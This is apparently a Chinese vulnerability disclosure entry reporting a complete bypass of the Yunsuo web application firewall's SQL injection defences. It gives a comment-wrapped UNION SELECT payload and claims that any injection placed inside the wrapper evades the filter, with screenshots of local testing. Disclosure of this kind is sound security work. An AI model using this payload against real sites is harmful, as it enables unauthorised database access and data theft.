云锁 sql注入防御策略 完全bypass #1

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 先来一发 ### 详细说明: payload: http://**.**.**.**/?id=/*' union select 1,2 from users%23*/ 过程参考我发的安全狗那个http://**.**.**.**/bugs/wooyun-2015-0163141 效果: 完全无视sql注入策略 使用这样的语句: http://**.**.**.**/?id=/*' xxxxxxxxxx %23*/ 中间xxx任意注入,可以完全bypass [<img src="https://images.seebug.org/upload/201512/211301447559d8a27db7cfa709359f3f11952229.png" alt="屏幕快照 2015-12-21 下午1.01.34.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/211301447559d8a27db7cfa709359f3f11952229.png) ### 漏洞证明: 本地下载了最新版云锁,开启了sql注入的防御 [<img src="https://images.seebug.org/upload/201512/211649462ab4b4b6ffaf979796dbc2b9649f7abe.png" alt="屏幕快照 2015-12-21 下午4.47.43.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/211649462ab4b4b6ffaf979796dbc2b9649f7abe.png) 测一下 [<img src="https://images.seebug.org/upload/201512/21165014b9e1645b5276cba09c247449481bf186.png" alt="屏幕快照 2015-12-21 下午4.45.25.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息